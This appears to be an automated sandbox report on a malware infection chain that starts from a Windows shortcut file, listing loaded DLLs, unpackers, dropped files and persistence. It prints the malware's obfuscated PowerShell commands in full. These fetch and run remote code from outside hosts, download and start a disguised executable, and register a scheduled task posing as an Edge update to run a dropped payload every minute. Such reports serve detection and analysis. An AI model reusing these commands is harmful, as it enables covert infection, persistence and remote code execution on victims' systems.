Source: C:\Windows\System32\regsvr32.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: secur32.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: schannel.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: webio.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sxs.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: devenum.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winmm.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: devobj.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: msdmo.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsadu.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mpr.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: netutils.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: userenv.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: efsutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: vaultcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: credui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: feclient.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: msimg32.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: winmm.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\rekeywiz.exe Section loaded: wldp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\utox_x86_x64.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32 Jump to behavior
Source: fBcMVl6ns6.lnk LNK file: ..\..\..\..\Windows\system32\cmd.exe
Source: C:\Users\Public\ajbs50ul.bat File written: C:\Users\user\AppData\Roaming\M08e.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook Jump to behavior
Source: Binary string: kernel32.pdbUGP source: regsvr32.exe, 00000009.00000003.1618546473.000000001B330000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1619728740.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632811056.000001F9E0530000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632244742.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdbUGP source: regsvr32.exe, 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1625000511.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1634556550.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000009.00000003.1604799073.000000001C000000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1606444269.000000001C1F0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629919350.000001F9E0660000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629243425.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernel32.pdb source: regsvr32.exe, 00000009.00000003.1618546473.000000001B330000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1619728740.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632811056.000001F9E0530000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632244742.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000009.00000003.1604799073.000000001C000000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1606444269.000000001C1F0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629919350.000001F9E0660000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629243425.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdb source: regsvr32.exe, 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1625000511.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1634556550.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 9.2.regsvr32.exe.12909ac0.3.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 9.2.regsvr32.exe.12909ac0.3.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 9.3.regsvr32.exe.2554f70.6.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 9.3.regsvr32.exe.2554f70.6.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 9.2.regsvr32.exe.1b040000.4.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 9.2.regsvr32.exe.1b040000.4.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 9.2.regsvr32.exe.2554f70.0.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 9.2.regsvr32.exe.2554f70.0.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 9.3.regsvr32.exe.2554f70.7.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 9.3.regsvr32.exe.2554f70.7.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.35.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.35.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.80.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.80.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.76.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.76.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.32.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.32.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.23.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.23.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.84.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.84.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.53.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.53.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 14.3.OpenWith.exe.1f9e0e8aa00.16.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 14.3.OpenWith.exe.1f9e0e8aa00.16.raw.unpack, Runtime.cs .Net Code: CoreMain
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit Jump to behavior
Suspicious powershell command line found
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" Jump to behavior
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
PE file contains sections with non-standard names
Source: utox_x86_x64.exe.3.dr Static PE information: section name: .rodata
Source: utox_x86_x64.exe.3.dr Static PE information: section name: .xdata
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /4
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /19
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /31
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /45
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /57
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /70
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /81
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /92
Source: ajbs50ul.bat.3.dr Static PE information: section name: .xdata
Source: M08e.ini.4.dr Static PE information: section name: .xdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFB4B36752B push ebx; iretd 3_2_00007FFB4B36756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFB4B434465 push ebp; iretd 3_2_00007FFB4B434468
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D223E20 push rsi; retf 4_2_00007FF63D3FBAFB
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D223E20 push rbp; retf 4_2_00007FF63D3FBB4B
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D3FBA98 push rbp; retf 4_2_00007FF63D3FBA9B
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2CCA4C push rbp; retf 4_2_00007FF63D3FBB23
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2CCA4C push rsi; retf 4_2_00007FF63D3FBB83
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2CCB54 push rbp; retf 4_2_00007FF63D3FBA1B
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2CCB7C push rsi; retf 4_2_00007FF63D3FB9FB
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D3FBC00 push rbp; retf 4_2_00007FF63D3FBC03
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2CC954 push rsi; retf 4_2_00007FF63D3FBC3B
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D3FB710 push rbp; retf 4_2_00007FF63D3FB713
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D3FB720 push rbp; retf 4_2_00007FF63D3FB723
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D3FB718 push rbp; retf 4_2_00007FF63D3FB71B
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D272CF0 push rbp; retf 4_2_00007FF63D3FBB23
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB4B27D2A5 pushad ; iretd 5_2_00007FFB4B27D2A6
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C48BE push eax; retf 9_3_028C48BF
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C4EB2 pushad ; retf 9_3_028C4EB3
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C5ED9 push esi; ret 9_3_028C5EDD
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C62E3 push ebx; ret 9_3_028C62E6
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C40F7 push eax; ret 9_3_028C40FB
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C220B push eax; iretd 9_3_028C2224
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C6C12 push edx; retf 9_3_028C6C26
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C4427 pushad ; ret 9_3_028C4428
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C5643 push eax; retf 9_3_028C5645
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C1865 push cs; ret 9_3_028C18C4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C17D5 push cs; ret 9_3_028C18C4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C35EC push esi; ret 9_3_028C35ED
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C59E3 push esi; retf 9_3_028C59E6
Source: C:\Windows\System32\regsvr32.exe Code function: 9_3_028C430B push eax; retf 9_3_028C430C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_028C48BE push eax; retf 9_2_028C48BF

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\regsvr32.exe
Source: LNK file Process created: C:\Windows\System32\regsvr32.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\regsvr32.exe
Source: LNK file Process created: C:\Windows\System32\regsvr32.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\regsvr32.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\regsvr32.exe
Drops PE files
Source: C:\Windows\System32\rekeywiz.exe File created: C:\Users\user\AppData\Roaming\Gga6.ini Jump to dropped file
Source: C:\Users\Public\ajbs50ul.bat File created: C:\Users\user\AppData\Roaming\M08e.ini Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Desktop\utox_x86_x64.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Source: C:\Users\Public\ajbs50ul.bat File created: C:\Users\user\AppData\Roaming\M08e.ini Jump to dropped file
Source: C:\Windows\System32\rekeywiz.exe File created: C:\Users\user\AppData\Roaming\Gga6.ini Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'utox_x86_x64.exe') -oulv 'htv7i9rockp24tdocs.lol/utox_x86.p24xp24';exit[Environment]::GetEnvironmentVariable('public') + '\\ajbs50ul.bat'(New-Object System.Net.WebClient).DownloadFile($oulv.Replace('v7i9','tps://').Replace('p24', 'e'), $fz)start $fz@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin", "Get-Clipboard", "Set-Clipboard", "Get-ComputerInfo", "Get-TimeZone", "Set-TimeZone")CompatiblePSEditions = @('Desktop','Core')} if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") { $myinv = $_.InvocationInfo if ($myinv -and $myinv.MyCommand)

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
